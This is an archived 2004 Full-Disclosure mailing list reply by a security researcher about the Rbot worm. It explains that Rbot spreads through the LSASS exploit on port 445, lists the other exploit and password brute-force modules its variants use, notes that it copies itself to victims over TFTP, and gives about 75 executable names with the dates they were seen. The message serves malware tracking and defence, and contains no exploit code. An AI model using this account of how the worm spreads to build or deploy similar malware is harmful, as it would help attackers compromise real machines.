Re: [Full-Disclosure] Microsoft Update Loader msrtwd.exe

From: Joe Stewart (jstewart_at_lurhq.com)
Date: 09/02/04

Next message: Sune Kloppenborg Jeppesen: "[ GLSA 200409-01 ] vpopmail: Multiple vulnerabilities"

Previous message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Response to comments on Security and Obscurity"
In reply to: S.A. Birl: "[Full-Disclosure] Microsoft Update Loader msrtwd.exe"
Next in thread: Todd Towles: "RE: [Full-Disclosure] Microsoft Update Loader msrtwd.exe"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: full-disclosure@lists.netsys.com
Date: Thu, 2 Sep 2004 10:49:55 -0400

On Thu, 2 Sep 2004 10:16:30 -0400, S.A. Birl wrote:
>Does anyone know how it infects?

Primarily via the LSASS exploit over port 445, but variants have been
seen with the following additional exploits/password brute-force
spreading modules:

WebDav
Lsass135
Lsass1025
NetBios
NTPass
Dcom135
Dcom445
Dcom1025
MSSQL
Beagle1
Beagle2
MyDoom
Optix
UPNP
NetDevil
DameWare
Kuang2
Sub7

After the exploit, the bot is copied to the victim using the Windows
tftp client.

> http://virusscan.jotti.dhs.org/ lists msrtwd.exe as backdoor.sdbot.gen

Yes, some AV companies identify Rbot as SDbot, even though the two look
almost nothing alike. It could be that Rbot was derived from SDbot, but
it has grown substantially, and is almost on par with Agobot in terms
of functionality.

Because there are so many variants, each with a different exe name, it's
sometimes hard to keep track of them. Just so it can be indexed for
future reference, here is a list of Rbot exe names we've seen during
exploit captures, and dates we've seen them spreading over the last 3
months:

Dates Seen Exe Name
---------------------------------
2004/06/06 - 2004/06/27 lsrv.exe
2004/06/06 - 2004/08/28 wuapdate16.exe
2004/06/07 - 2004/06/15 sndcfg16.exe
2004/06/07 - 2004/08/30 wuamgrd.exe
2004/06/08 - 2004/06/27 lsac.exe
2004/06/10 - 2004/06/10 winupdos.exe
2004/06/10 - 2004/06/26 dosprmwin.exe
2004/06/11 - 2004/06/11 systemse.exe
2004/06/11 - 2004/08/18 scrgrd.exe
2004/06/13 - 2004/06/13 dude.exe
2004/06/14 - 2004/06/14 esplorer.exe
2004/06/14 - 2004/06/14 landriver32.exe
2004/06/14 - 2004/06/14 mpd.exe
2004/06/14 - 2004/06/14 updatez.exe
2004/06/14 - 2004/06/25 svssshost.exe
2004/06/14 - 2004/08/26 jacfg2.exe
2004/06/17 - 2004/06/26 wuammgr32.exe
2004/06/18 - 2004/06/18 svhost.exe
2004/06/18 - 2004/06/18 wuamgrd32.exe
2004/06/18 - 2004/06/23 wuamagrd.exe
2004/06/20 - 2004/06/20 wloader.exe
2004/06/21 - 2004/08/29 pidserv.exe
2004/06/22 - 2004/09/01 navscan32.exe
2004/06/23 - 2004/06/23 hpsysmon.exe
2004/06/24 - 2004/06/24 winipcfgs.exe
2004/06/24 - 2004/06/24 wwwstream.exe
2004/06/25 - 2004/06/25 lcsrv64.exe
2004/06/25 - 2004/06/25 srvhost.exe
2004/06/25 - 2004/06/25 systemnt.exe
2004/06/25 - 2004/06/25 win64.exe
2004/06/27 - 2004/06/27 win32apisrvr.exe
2004/08/16 - 2004/08/24 soundblaster.exe
2004/08/16 - 2004/08/25 msnmsg.exe
2004/08/16 - 2004/08/27 windowsup.exe
2004/08/16 - 2004/08/29 muamgrd.exe
2004/08/16 - 2004/08/30 winupdater.exe
2004/08/16 - 2004/08/31 win16update.exe
2004/08/16 - 2004/09/01 dllmngr32.exe
2004/08/17 - 2004/08/17 msdev.exe
2004/08/17 - 2004/08/17 svchostc.exe
2004/08/17 - 2004/08/31 javatm.exe
2004/08/17 - 2004/08/31 usbsvc.exe
2004/08/17 - 2004/09/01 msnmsgr.exe
2004/08/18 - 2004/08/18 mnzks.exe
2004/08/18 - 2004/08/18 notepad.exe
2004/08/18 - 2004/08/18 tcpip.exe
2004/08/19 - 2004/08/19 mss3rvices200x.exe
2004/08/19 - 2004/08/19 msservices200x.exe
2004/08/19 - 2004/09/01 iexplore.exe
2004/08/23 - 2004/08/23 msrtwd.exe
2004/08/24 - 2004/08/24 csass.exe
2004/08/24 - 2004/08/24 winxp32.exe
2004/08/24 - 2004/08/26 nmon.exe
2004/08/24 - 2004/08/27 winupdate.exe
2004/08/24 - 2004/09/01 msnplus.exe
2004/08/25 - 2004/08/25 lsas.exe
2004/08/25 - 2004/08/27 dwervdl32.exe
2004/08/26 - 2004/08/26 jutsu.exe
2004/08/26 - 2004/08/26 usb.exe
2004/08/26 - 2004/08/26 win43.exe
2004/08/27 - 2004/08/27 java.exe
2004/08/27 - 2004/08/27 svchost32.exe
2004/08/27 - 2004/08/29 iexplorer.exe
2004/08/27 - 2004/08/30 ati2vid.exe
2004/08/27 - 2004/08/30 svchosts.exe
2004/08/29 - 2004/08/29 server.exe
2004/08/29 - 2004/08/30 nortoanavap.exe
2004/08/29 - 2004/09/02 syswin32.exe
2004/08/30 - 2004/09/02 rsvc32.exe
2004/08/30 - 2004/09/02 vsmons.exe
2004/08/31 - 2004/08/31 winsrv.exe
2004/09/02 - 2004/09/02 sslwina.exe
2004/09/02 - 2004/09/02 winxpini.exe

-Joe

-- 
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Sune Kloppenborg Jeppesen: "[ GLSA 200409-01 ] vpopmail: Multiple vulnerabilities"

Previous message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Response to comments on Security and Obscurity"
In reply to: S.A. Birl: "[Full-Disclosure] Microsoft Update Loader msrtwd.exe"
Next in thread: Todd Towles: "RE: [Full-Disclosure] Microsoft Update Loader msrtwd.exe"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]